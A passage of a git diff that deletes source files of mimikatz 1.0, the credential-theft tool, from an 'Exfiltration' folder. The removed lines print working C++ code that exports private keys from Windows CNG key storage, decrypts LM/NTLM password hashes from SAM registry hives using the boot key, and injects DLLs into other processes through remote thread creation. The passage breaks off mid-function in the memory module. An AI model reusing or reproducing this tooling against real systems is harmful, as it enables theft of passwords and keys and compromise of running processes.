LoadLibrary(L"ncrypt"); - -PNCRYPT_OPEN_STORAGE_PROVIDER K_NCryptOpenStorageProvider = reinterpret_cast<PNCRYPT_OPEN_STORAGE_PROVIDER>(GetProcAddress(hNcrypt, "NCryptOpenStorageProvider")); -PNCRYPT_ENUM_KEYS K_NCryptEnumKeys = reinterpret_cast<PNCRYPT_ENUM_KEYS>(GetProcAddress(hNcrypt, "NCryptEnumKeys")); -PNCRYPT_OPEN_KEY K_NCryptOpenKey = reinterpret_cast<PNCRYPT_OPEN_KEY>(GetProcAddress(hNcrypt, "NCryptOpenKey")); -PNCRYPT_EXPORT_KEY K_NCryptExportKey = reinterpret_cast<PNCRYPT_EXPORT_KEY>(GetProcAddress(hNcrypt, "NCryptExportKey")); -PNCRYPT_GET_PROPERTY K_NCryptGetProperty = reinterpret_cast<PNCRYPT_GET_PROPERTY>(GetProcAddress(hNcrypt, "NCryptGetProperty")); - -PNCRYPT_FREE_BUFFER K_NCryptFreeBuffer = reinterpret_cast<PNCRYPT_FREE_BUFFER>(GetProcAddress(hNcrypt, "NCryptFreeBuffer")); -PNCRYPT_FREE_OBJECT K_NCryptFreeObject = reinterpret_cast<PNCRYPT_FREE_OBJECT>(GetProcAddress(hNcrypt, "NCryptFreeObject")); - -PBCRYPT_ENUM_REGISTERED_PROVIDERS K_BCryptEnumRegisteredProviders = reinterpret_cast<PBCRYPT_ENUM_REGISTERED_PROVIDERS>(GetProcAddress(hNcrypt, "BCryptEnumRegisteredProviders")); -PBCRYPT_FREE_BUFFER K_BCryptFreeBuffer = reinterpret_cast<PBCRYPT_FREE_BUFFER>(GetProcAddress(hNcrypt, "BCryptFreeBuffer")); - -bool mod_cryptong::isNcrypt = ( - hNcrypt && - K_NCryptOpenStorageProvider && - K_NCryptEnumKeys && - K_NCryptOpenKey && - K_NCryptExportKey && - K_NCryptGetProperty && - K_NCryptFreeBuffer && - K_NCryptFreeObject && - K_BCryptEnumRegisteredProviders && - K_BCryptFreeBuffer -); - -bool mod_cryptong::justInitCNG(LPCWSTR pszProviderName) -{ - bool reussite = false; - NCRYPT_PROV_HANDLE hProvider; - - if(K_NCryptOpenStorageProvider(&hProvider, pszProviderName, 0) == ERROR_SUCCESS) - reussite = (K_NCryptFreeObject(hProvider) == 0); - - return reussite; -} - - -bool mod_cryptong::getVectorProviders(vector<wstring> * monVectorProviders) -{ - bool reussite = false; - - DWORD cbBuffer; - PCRYPT_PROVIDERS pBuffer = NULL; - - if(reussite = (K_BCryptEnumRegisteredProviders(&cbBuffer, &pBuffer) == 0)) - { - for(DWORD i = 0; i < pBuffer->cProviders; i++) - monVectorProviders->push_back(pBuffer->rgpszProviders[i]); - K_BCryptFreeBuffer(pBuffer); - } - - return reussite; -} - -bool mod_cryptong::getVectorContainers(vector<wstring> * monVectorContainers, bool isMachine) -{ - bool reussite = false; - NCRYPT_PROV_HANDLE hProvider; - NCryptKeyName * pKeyName; - PVOID pEnumState = NULL; - - SECURITY_STATUS retour; - if(K_NCryptOpenStorageProvider(&hProvider, /*MS_KEY_STORAGE_PROVIDER*/ NULL, 0) == ERROR_SUCCESS) - { - while((retour = K_NCryptEnumKeys(hProvider, NULL, &pKeyName, &pEnumState, (isMachine ? NCRYPT_MACHINE_KEY_FLAG : NULL))) == ERROR_SUCCESS) - { - monVectorContainers->push_back(pKeyName->pszName); - K_NCryptFreeBuffer(pKeyName); - } - reussite = (retour == NTE_NO_MORE_ITEMS); - - if(pEnumState) - K_NCryptFreeBuffer(pEnumState); - K_NCryptFreeObject(hProvider); - } - - return reussite; -} - -bool mod_cryptong::getHKeyFromName(wstring keyName, NCRYPT_KEY_HANDLE * keyHandle, bool isMachine) -{ - bool reussite = false; - NCRYPT_PROV_HANDLE hProvider; - - if(K_NCryptOpenStorageProvider(&hProvider, /*MS_KEY_STORAGE_PROVIDER*/ NULL, 0) == ERROR_SUCCESS) - { - reussite = K_NCryptOpenKey(hProvider, keyHandle, keyName.c_str(), 0, (isMachine ? NCRYPT_MACHINE_KEY_FLAG : NULL)) == ERROR_SUCCESS; - K_NCryptFreeObject(hProvider); - } - - return reussite; -} - - - -bool mod_cryptong::getKeySize(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE * provOrCle, DWORD * keySize) -{ - DWORD tailleEcrite = 0; - return ((K_NCryptGetProperty(*provOrCle, NCRYPT_LENGTH_PROPERTY, reinterpret_cast<BYTE *>(keySize), sizeof(DWORD), &tailleEcrite, 0) == 0) && tailleEcrite == sizeof(DWORD)); -} - - -bool mod_cryptong::isKeyExportable(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE * provOrCle, bool * isExportable) -{ - bool reussite = false; - DWORD tailleEcrite = 0, exportability = 0; - - if(reussite = ((K_NCryptGetProperty(*provOrCle, NCRYPT_EXPORT_POLICY_PROPERTY, reinterpret_cast<BYTE *>(&exportability), sizeof(DWORD), &tailleEcrite, 0) == 0) && tailleEcrite == sizeof(DWORD))) - { - *isExportable =(exportability & NCRYPT_ALLOW_EXPORT_FLAG) != 0; - } - return reussite; -} - -bool mod_cryptong::getPrivateKey(NCRYPT_KEY_HANDLE maCle, PBYTE * monExport, DWORD * tailleExport, LPCWSTR pszBlobType) -{ - SECURITY_STATUS monRetour = K_NCryptExportKey(maCle, NULL, pszBlobType, NULL, NULL, 0, tailleExport, 0); - if(monRetour == ERROR_SUCCESS) - { - *monExport = new BYTE[*tailleExport]; - monRetour = K_NCryptExportKey(maCle, NULL, pszBlobType, NULL, *monExport, *tailleExport, tailleExport, 0); - - if(monRetour != ERROR_SUCCESS) - delete[] monExport; - } - SetLastError(monRetour); - return (monRetour == ERROR_SUCCESS); -} - - -bool mod_cryptong::NCryptFreeObject(NCRYPT_HANDLE hObject) -{ - return (K_NCryptFreeObject(hObject) == 0); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_cryptong.h b/Exfiltration/mimikatz-1.0/modules/mod_cryptong.h deleted file mode 100644 index 3eec5b6..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_cryptong.h +++ /dev/null @@ -1,24 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <bcrypt.h> -#include <sstream> - -class mod_cryptong /* Ref : http://msdn.microsoft.com/en-us/library/aa376210.aspx */ -{ -public: - static bool getVectorProviders(vector<wstring> * monVectorProviders); - static bool getVectorContainers(vector<wstring> * monVectorContainers, bool isMachine = false); - static bool getHKeyFromName(wstring keyName, NCRYPT_KEY_HANDLE * keyHandle, bool isMachine = false); - static bool getKeySize(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE * provOrCle, DWORD * keySize); - static bool isKeyExportable(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE * provOrCle, bool * isExportable); - static bool getPrivateKey(NCRYPT_KEY_HANDLE maCle, PBYTE * monExport, DWORD * tailleExport, LPCWSTR pszBlobType = LEGACY_RSAPRIVATE_BLOB); - static bool NCryptFreeObject(NCRYPT_HANDLE hObject); - - static bool isNcrypt; - static bool justInitCNG(LPCWSTR pszProviderName = NULL); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_hash.cpp b/Exfiltration/mimikatz-1.0/modules/mod_hash.cpp deleted file mode 100644 index fe32c49..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_hash.cpp +++ /dev/null @@ -1,150 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_hash.h" - -PSYSTEM_FUNCTION_006 mod_hash::SystemFunction006 = reinterpret_cast<PSYSTEM_FUNCTION_006>(GetProcAddress(GetModuleHandle(L"advapi32"), "SystemFunction006")); -PSYSTEM_FUNCTION_007 mod_hash::SystemFunction007 = reinterpret_cast<PSYSTEM_FUNCTION_007>(GetProcAddress(GetModuleHandle(L"advapi32"), "SystemFunction007")); -PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING mod_hash::RtlUpcaseUnicodeStringToOemString = reinterpret_cast<PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING>(GetProcAddress(GetModuleHandle(L"ntdll"), "RtlUpcaseUnicodeStringToOemString")); -PRTL_INIT_UNICODESTRING mod_hash::RtlInitUnicodeString = reinterpret_cast<PRTL_INIT_UNICODESTRING>(GetProcAddress(GetModuleHandle(L"ntdll"), "RtlInitUnicodeString")); -PRTL_FREE_OEM_STRING mod_hash::RtlFreeOemString = reinterpret_cast<PRTL_FREE_OEM_STRING>(GetProcAddress(GetModuleHandle(L"ntdll"), "RtlFreeOemString")); - -bool mod_hash::lm(wstring * chaine, wstring * hash) -{ - bool status = false; - UNICODE_STRING maChaine; - OEM_STRING maDestination; - BYTE monTab[16]; - - RtlInitUnicodeString(&maChaine, chaine->c_str()); - if(NT_SUCCESS(RtlUpcaseUnicodeStringToOemString(&maDestination, &maChaine, TRUE))) - { - if(status = NT_SUCCESS(SystemFunction006(maDestination.Buffer, monTab))) - hash->assign(mod_text::stringOfHex(monTab, sizeof(monTab))); - - RtlFreeOemString(&maDestination); - } - return status; -} - -bool mod_hash::ntlm(wstring * chaine, wstring * hash) -{ - bool status = false; - UNICODE_STRING maChaine; - BYTE monTab[16]; - - RtlInitUnicodeString(&maChaine, chaine->c_str()); - if(status = NT_SUCCESS(SystemFunction007(&maChaine, monTab))) - hash->assign(mod_text::stringOfHex(monTab, sizeof(monTab))); - return status; -} - -void mod_hash::getBootKeyFromKey(BYTE bootkey[0x10], BYTE key[0x10]) -{ - BYTE permut[] = {0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04}; - for(unsigned int i = 0; i < 0x10; i++) - bootkey[i] = key[permut[i]]; -} - -bool mod_hash::getHbootKeyFromBootKeyAndF(BYTE hBootKey[0x10], BYTE bootKey[0x10], BYTE * AccountsF) -{ - bool reussite = false; - unsigned char qwe[] = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"; - unsigned char num[] = "0123456789012345678901234567890123456789"; - - HCRYPTPROV hCryptProv = NULL; - HCRYPTHASH hHash = NULL; - if(CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) - { - BYTE md5hash[0x10] = {0}; - DWORD dwHashDataLen = sizeof(md5hash); - CryptCreateHash(hCryptProv, CALG_MD5, 0, 0, &hHash); - CryptHashData(hHash, AccountsF + 0x70, 0x10, 0); - CryptHashData(hHash, qwe, sizeof(qwe), 0); - CryptHashData(hHash, bootKey, 0x10, 0); - CryptHashData(hHash, num, sizeof(num), 0); - CryptGetHashParam(hHash, HP_HASHVAL, md5hash, &dwHashDataLen, 0); - CryptDestroyHash(hHash); - CryptReleaseContext(hCryptProv, 0); - reussite = mod_crypto::genericDecrypt(AccountsF + 0x80, 0x10, md5hash, 0x10, CALG_RC4, hBootKey, 0x10); - } - return reussite; -} - -bool mod_hash::decryptHash(wstring * hash, BYTE * hBootKey, USER_V * userV, SAM_ENTRY * encHash, DWORD rid, bool isNtlm) -{ - bool reussite = false; - unsigned char ntpassword[] = "NTPASSWORD"; - unsigned char lmpassword[] = "LMPASSWORD"; - - BYTE obfkey[0x10]; - BYTE mes2CleDES[0x10]; - - if(encHash->lenght == 0x10 + 4) - { - HCRYPTPROV hCryptProv = NULL; - HCRYPTHASH hHash = NULL; - if(CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) - { - BYTE md5hash[0x10] = {0}; - DWORD dwHashDataLen = 0x10; - CryptCreateHash(hCryptProv, CALG_MD5, 0, 0, &hHash); - CryptHashData(hHash, hBootKey, 0x10, 0); - CryptHashData(hHash, (BYTE *) &rid, sizeof(rid), 0); - CryptHashData(hHash, isNtlm ? ntpassword : lmpassword, isNtlm ? sizeof(ntpassword) : sizeof(lmpassword), 0); - CryptGetHashParam(hHash, HP_HASHVAL, md5hash, &dwHashDataLen, 0); - CryptDestroyHash(hHash); - - CryptReleaseContext(hCryptProv, 0); - - if(mod_crypto::genericDecrypt(&(userV->datas) + encHash->offset + 4, 0x10, md5hash, 0x10, CALG_RC4, obfkey, 0x10)) - { - sid_to_key1(rid, mes2CleDES); - sid_to_key2(rid, mes2CleDES + 8); - - reussite = mod_crypto::genericDecrypt(obfkey + 0, sizeof(obfkey) / 2, mes2CleDES + 0, sizeof(mes2CleDES) / 2, CALG_DES) && - mod_crypto::genericDecrypt(obfkey + 8, sizeof(obfkey) / 2, mes2CleDES + 8, sizeof(mes2CleDES) / 2, CALG_DES); - } - } - } - hash->assign(reussite ? mod_text::stringOfHex(obfkey, sizeof(obfkey)) : L""); - - return reussite; -} - -void mod_hash::str_to_key(BYTE *str, BYTE *key) -{ - key[0] = str[0] >> 1; - key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2); - key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3); - key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4); - key[4] = ((str[3] & 0x0f) << 3) | (str[4] >> 5); - key[5] = ((str[4] & 0x1f) << 2) | (str[5] >> 6); - key[6] = ((str[5] & 0x3f) << 1) | (str[6] >> 7); - key[7] = str[6] & 0x7f; - for (DWORD i = 0; i < 8; i++) - key[i] = (key[i] << 1); -} - -void mod_hash::sid_to_key1(DWORD sid, BYTE deskey[8]) -{ - unsigned char s[7]; - s[0] = s[4] = (unsigned char)((sid) & 0xff); - s[1] = s[5] = (unsigned char)((sid >> 8) & 0xff); - s[2] = s[6] = (unsigned char)((sid >>16) & 0xff); - s[3] = (unsigned char)((sid >>24) & 0xff); - str_to_key(s, deskey); -} - -void mod_hash::sid_to_key2(DWORD sid, BYTE deskey[8]) -{ - unsigned char s[7]; - - s[0] = s[4] = (unsigned char)((sid >>24) & 0xff); - s[1] = s[5] = (unsigned char)((sid) & 0xff); - s[2] = s[6] = (unsigned char)((sid >> 8) & 0xff); - s[3] = (unsigned char)((sid >>16) & 0xff); - str_to_key(s, deskey); -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_hash.h b/Exfiltration/mimikatz-1.0/modules/mod_hash.h deleted file mode 100644 index 19d7c44..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_hash.h +++ /dev/null @@ -1,81 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_text.h" -#include "mod_crypto.h" - -class mod_hash -{ -private: - static PSYSTEM_FUNCTION_006 SystemFunction006; - static PSYSTEM_FUNCTION_007 SystemFunction007; - static PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING RtlUpcaseUnicodeStringToOemString; - static PRTL_INIT_UNICODESTRING RtlInitUnicodeString; - static PRTL_FREE_OEM_STRING RtlFreeOemString; - -public: - typedef enum _KIWI_HASH_TYPE - { - LM, - NTLM - } KIWI_HASH_TYPE; - - typedef struct _SAM_ENTRY { - DWORD offset; - DWORD lenght; - DWORD unk; -} SAM_ENTRY, *PSAM_SENTRY; - - typedef struct _OLD_LARGE_INTEGER { - unsigned long LowPart; - long HighPart; - } OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER; - - typedef struct _USER_F { // http://www.beginningtoseethelight.org/ntsecurity/index.php#D3BC3F5643A17823 - DWORD unk0_header; - DWORD align; - OLD_LARGE_INTEGER LastLogon; - OLD_LARGE_INTEGER LastLogoff; - OLD_LARGE_INTEGER PasswordLastSet; - OLD_LARGE_INTEGER AccountExpires; - OLD_LARGE_INTEGER PasswordMustChange; - unsigned long UserId; - unsigned long unk1; - unsigned long UserAccountControl; - } USER_F, *PUSER_F; - - typedef struct _USER_V { - SAM_ENTRY unk0; - SAM_ENTRY Username; - SAM_ENTRY Fullname; - SAM_ENTRY Comment; - SAM_ENTRY UserComment; - SAM_ENTRY unk1; - SAM_ENTRY Homedir; - SAM_ENTRY Homedirconnect; - SAM_ENTRY Scriptpath; - SAM_ENTRY Profilepath; - SAM_ENTRY Workstations; - SAM_ENTRY HoursAllowed; - SAM_ENTRY unk2; - SAM_ENTRY LM; - SAM_ENTRY NTLM; - SAM_ENTRY unk3; - SAM_ENTRY unk4; - BYTE datas; - } USER_V, *PUSER_V; - - static bool lm(wstring * chaine, wstring * hash); - static bool ntlm(wstring * chaine, wstring * hash); - - static void getBootKeyFromKey(BYTE bootkey[0x10], BYTE key[0x10]); - static bool getHbootKeyFromBootKeyAndF(BYTE hBootKey[0x10], BYTE bootKey[0x10], BYTE * AccountsF); - static bool decryptHash(wstring * hash, BYTE * hBootKey, USER_V * userV, SAM_ENTRY * encHash, DWORD rid, bool isNtlm); - static void str_to_key(BYTE *str, BYTE *key); - static void sid_to_key1(DWORD sid, BYTE deskey[8]); - static void sid_to_key2(DWORD sid, BYTE deskey[8]); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_hive.cpp b/Exfiltration/mimikatz-1.0/modules/mod_hive.cpp deleted file mode 100644 index a0e79cd..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_hive.cpp +++ /dev/null @@ -1,242 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_hive.h" - -mod_hive::nk_hdr* mod_hive::read_nk(nk_hdr *nk, hive *h, int offset ) -{ - memcpy(nk, h->base + offset + 4, sizeof(nk_hdr)); - nk->key_name = (h->base + offset + 4 + 76); - return nk; -} - -mod_hive::lf_hdr* mod_hive::read_lf(lf_hdr *lf, hive *h, int offset ) -{ - memcpy(lf, h->base+offset+4, sizeof(lf_hdr)); - lf->hr = (h->base+offset+4+4); - return lf; -} - -mod_hive::vk_hdr* mod_hive::read_vk(vk_hdr *vk, hive *h, int offset ) -{ - memcpy(vk, h->base+offset+4, sizeof(vk_hdr)); - vk->value_name = (h->base+offset+4+20); - return vk; -} - -int* mod_hive::read_valuevector(int *value, hive *h, int offset, int size ) -{ - memcpy(value, h->base+offset+4, size*sizeof(int)); - return value; -} - -mod_hive::hashrecord* mod_hive::read_hr(hashrecord *hr, unsigned char *pos, int index ) -{ - pos+=(8*index); - memcpy(hr, pos, sizeof(hashrecord)); - return hr; -} - - -unsigned char* mod_hive::read_data(hive *h, int offset ) -{ - return ((unsigned char*) (h->base + offset + 4)); -} - -bool mod_hive::InitHive(hive *h) -{ - h->base = NULL; - return true; -} - -bool mod_hive::RegOpenHive(const wchar_t *filename, hive *h) -{ - bool reussite = false; - FILE *hiveh; - unsigned long hsize; - - if(_wfopen_s(&hiveh, filename, L"rb" ) == 0) - { - if(fseek(hiveh, 0, SEEK_END) == 0) - { - hsize = ftell(hiveh); - h->base = new unsigned char[hsize]; - fseek(hiveh, 0, SEEK_SET); - - if(fread(h->base, hsize, 1, hiveh) == 1) - { - reussite = *((int *)h->base) == 0x66676572; - } - } - fclose(hiveh); - } - return reussite; -} - -bool mod_hive::RegCloseHive(hive *h ) -{ - if(h->base != NULL) - { - delete[] h->base; - } - return true; -} - - -long mod_hive::parself(hive *h, char *t, unsigned long off ) -{ - nk_hdr *n; - lf_hdr *l; - hashrecord *hr; - - int i; - - hr = (hashrecord*) malloc(sizeof(hashrecord)); - n = (nk_hdr*) malloc(sizeof(nk_hdr)); - l = (lf_hdr*) malloc(sizeof(lf_hdr)); - l = read_lf(l, h, off ); - - for(i = 0; i < l->key_num; i++ ) - { - hr = read_hr(hr, l->hr, i); - n = read_nk(n, h, hr->nk_offset + 0x1000 ); - if(!memcmp( t, n->key_name, n->name_len ) && (strlen(t) == n->name_len)) - { - free(n); - free(l); - return hr->nk_offset; - } - } - free(n); - free(l); - return -1; -} - -bool mod_hive::RegGetRootKey(hive *h, string *root_key) -{ - bool reussite = false; - nk_hdr * n = new nk_hdr(); - read_nk(n, h, 0x1020); - if (n->id == NK_ID && n->type == NK_ROOT) - { - root_key->assign((const char *) n->key_name, n->name_len); - reussite = true; - } - delete n; - return reussite; -} - -bool mod_hive::RegOpenKey(hive *h, string * path, nk_hdr **nr) -{ - bool reussite = false; - - nk_hdr *n = new nk_hdr(); - char *t, *tpath; - unsigned long noff = 0; - - read_nk(n, h, 0x1020); - - if(n->id == NK_ID && n->type == NK_ROOT) - { - tpath = strdup(path->c_str()); - t = strtok(tpath, "\\"); - - if(!memcmp(t, n->key_name, n->name_len)) - { - t = strtok(NULL, "\\"); - while(t != NULL) - { - noff = parself(h, t, n->lf_off + 0x1000); - if(noff != -1) - { - read_nk(n, h, noff + 0x1000); - t = strtok( NULL, "\\" ); - } - else - { - break; - } - } - - if(t == NULL && noff != 1) - { - memcpy(*nr, n, sizeof(nk_hdr)); - reussite = true; - } - } - free(tpath); - } - - delete n; - return reussite; -} - -bool mod_hive::RegQueryValue(hive *h, string *name, nk_hdr *nr, unsigned char **buff, int *len ) -{ - bool reussite = false; - - vk_hdr *v = new vk_hdr(); - int * l = new int[nr->value_cnt]; - - read_valuevector(l, h, nr->value_off + 0x1000, nr->value_cnt); - - for(unsigned int i = 0; i < nr->value_cnt; i++) - { - read_vk(v, h, l[i] + 0x1000); - if((!memcmp(name->c_str(), v->value_name, name->size()) && v->name_len == name->size()) || (name == NULL && (v->flag & 1) == 0)) - { - *len = v->data_len & 0x0000FFFF; - *buff = new unsigned char[*len]; - if (*len < 5) - { - memcpy(*buff, &(v->data_off), *len); - } - else - { - memcpy(*buff, read_data(h, v->data_off + 0x1000), *len); - } - reussite = true; - break; - } - } - delete[] l; - delete v; - return reussite; -} - -bool mod_hive::RegOpenKeyQueryValue(hive *h, string *path, string *name, unsigned char **buff, int *len) -{ - bool reussite = false; - mod_hive::nk_hdr * nodeKey = new mod_hive::nk_hdr(); - if(mod_hive::RegOpenKey(h, path, &nodeKey)) - { - reussite = mod_hive::RegQueryValue(h, name, nodeKey, buff, len); - } - delete nodeKey; - return reussite; -} - - - -bool mod_hive::RegEnumKey(hive *h, nk_hdr *nr, vector<string> * names) -{ - int index = 0; - - lf_hdr *lf = new lf_hdr(); - nk_hdr *nk = new nk_hdr(); - hashrecord *hr = new hashrecord(); - - while(index < nr->subkey_num) - { - lf = read_lf(lf, h, nr->lf_off + 0x1000 ); - hr = read_hr(hr, lf->hr, index); - nk = read_nk(nk, h, hr->nk_offset + 0x1000 ); - names->push_back(string(reinterpret_cast<char *>(nk->key_name), nk->name_len)); - index++; - } - - delete lf, nk, hr; - return !names->empty(); -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_hive.h b/Exfiltration/mimikatz-1.0/modules/mod_hive.h deleted file mode 100644 index 527a154..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_hive.h +++ /dev/null @@ -1,88 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -using namespace std; - -#define NK_ID 0x6B6E -#define NK_ROOT 0x2c -#define LF_ID 0x666C - -class mod_hive -{ -public: - typedef struct _hive - { - unsigned char *base; - } hive; - - typedef struct _nk_hdr - { - short int id; - short int type; - int t1, t2; - int unk1; - int parent_off; - int subkey_num; - int unk2; - int lf_off; - int unk3; - /* unsigned */ - unsigned int value_cnt; - int value_off; - int sk_off; - int classname_off; - int unk4[4]; - int unk5; - short int name_len; - short int classname_len; - unsigned char *key_name; - } nk_hdr; - - typedef struct _hashrecord - { - int nk_offset; - char keyname[4]; - } hashrecord; - - typedef struct _lf_hdr - { - short int id; - short int key_num; - unsigned char *hr; - } lf_hdr; - - typedef struct _vk_hdr - { - short int id; - short int name_len; - int data_len; - int data_off; - int data_type; - short int flag; - short int unk1; - unsigned char *value_name; - } vk_hdr; - - static bool InitHive(hive *h); - static bool RegOpenHive(const wchar_t * filename, hive *h); - static bool RegCloseHive(hive *h); - static bool RegGetRootKey(hive *h, string *root_key); - static bool RegOpenKey(hive *h, string *path, nk_hdr **nr); - static bool RegQueryValue(hive *h, /*char *name*/ string *name, nk_hdr *nr, unsigned char **buff, int *len); - static bool RegOpenKeyQueryValue(hive *h, string *path, string *name, unsigned char **buff, int *len); - static bool RegEnumKey(hive *h, nk_hdr *nr, vector<string> * names); - - static long parself(hive *h, char *t, unsigned long off); - static unsigned char* read_data(hive *h, int offset); -private: - static nk_hdr* read_nk(nk_hdr *nk, hive *h, int offset); - static lf_hdr* read_lf(lf_hdr *lf, hive *h, int offset); - static vk_hdr* read_vk(vk_hdr *vk, hive *h, int offset); - static hashrecord* read_hr(hashrecord *hr, unsigned char *pos, int index); - static int* read_valuevector(int *value, hive *h, int offset, int size); - -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_inject.cpp b/Exfiltration/mimikatz-1.0/modules/mod_inject.cpp deleted file mode 100644 index 2547a2d..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_inject.cpp +++ /dev/null @@ -1,72 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_inject.h" - -bool mod_inject::injectLibraryInHandle(const HANDLE & handleProcess, wstring * fullLibraryPath) -{ - bool reussite = false; - - wstring maLibComplete = L""; - if(mod_system::getAbsolutePathOf(*fullLibraryPath, &maLibComplete)) - { - bool fileExist = false; - if(mod_system::isFileExist(maLibComplete, &fileExist) && fileExist) - { - SIZE_T szFullLibraryPath = static_cast<SIZE_T>((maLibComplete.size() + 1) * sizeof(wchar_t)); - - if(LPVOID remoteVm = VirtualAllocEx(handleProcess, NULL, szFullLibraryPath, MEM_COMMIT, PAGE_EXECUTE_READWRITE)) - { - if(mod_memory::writeMemory(remoteVm, maLibComplete.c_str(), szFullLibraryPath, handleProcess)) - { - PTHREAD_START_ROUTINE pThreadStart = reinterpret_cast<PTHREAD_START_ROUTINE>(GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW")); - HANDLE hRemoteThread = INVALID_HANDLE_VALUE; - - if(mod_system::GLOB_Version.dwMajorVersion > 5) - { - PRTL_CREATE_USER_THREAD RtlCreateUserThread = reinterpret_cast<PRTL_CREATE_USER_THREAD>(GetProcAddress(GetModuleHandle(L"ntdll"), "RtlCreateUserThread")); - SetLastError(RtlCreateUserThread(handleProcess, NULL, 0, 0, 0, 0, pThreadStart, remoteVm, &hRemoteThread, NULL)); - } - else - { - hRemoteThread = CreateRemoteThread(handleProcess, NULL, 0, pThreadStart, remoteVm, 0, NULL); - } - - if(hRemoteThread && hRemoteThread != INVALID_HANDLE_VALUE) - { - WaitForSingleObject(hRemoteThread, INFINITE); - reussite = true; - CloseHandle(hRemoteThread); - } - } - VirtualFreeEx(handleProcess, remoteVm, 0, MEM_RELEASE); - } - } - } - return reussite; -} - -bool mod_inject::injectLibraryInPid(const DWORD & pid, wstring * fullLibraryPath) -{ - bool reussite = false; - if(HANDLE processHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid)) - { - reussite = injectLibraryInHandle(processHandle, fullLibraryPath); - CloseHandle(processHandle); - } - return reussite; -} - -bool mod_inject::injectLibraryInSingleProcess(wstring & processName, wstring * fullLibraryPath) -{ - bool reussite = false; - - mod_process::KIWI_PROCESSENTRY32 monProcess; - if(mod_process::getUniqueForName(&monProcess, &processName)) - { - reussite = injectLibraryInPid(monProcess.th32ProcessID, fullLibraryPath); - } - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_inject.h b/Exfiltration/mimikatz-1.0/modules/mod_inject.h deleted file mode 100644 index a0f77d8..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_inject.h +++ /dev/null @@ -1,19 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_memory.h" -#include "mod_system.h" -#include "mod_process.h" - -class mod_inject -{ -public: - static bool injectLibraryInHandle(const HANDLE & handleProcess, wstring * fullLibraryPath); - static bool injectLibraryInPid(const DWORD & pid, wstring * fullLibraryPath); - static bool injectLibraryInSingleProcess(wstring & processName, wstring * fullLibraryPath); -}; - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_memory.cpp b/Exfiltration/mimikatz-1.0/modules/mod_memory.cpp deleted file mode 100644 index 1e2ba8e..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_memory.cpp +++ /dev/null @@ -1,140 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_memory.h" - -bool mod_memory::readMemory(const void * adresseBase, void * adresseDestination, size_t longueur, HANDLE handleProcess) -{ - if(handleProcess == INVALID_HANDLE_VALUE) - { - return (memcpy_s(adresseDestination, longueur, adresseBase, longueur) == 0); - } - else - { - SIZE_T dwBytesRead = 0; - return ((ReadProcessMemory(handleProcess, adresseBase, adresseDestination, longueur, &dwBytesRead) != 0) && (dwBytesRead == longueur)); - } -} - -bool mod_memory::writeMemory(void * adresseBase, const void * adresseSource, size_t longueur, HANDLE handleProcess) -{ - bool 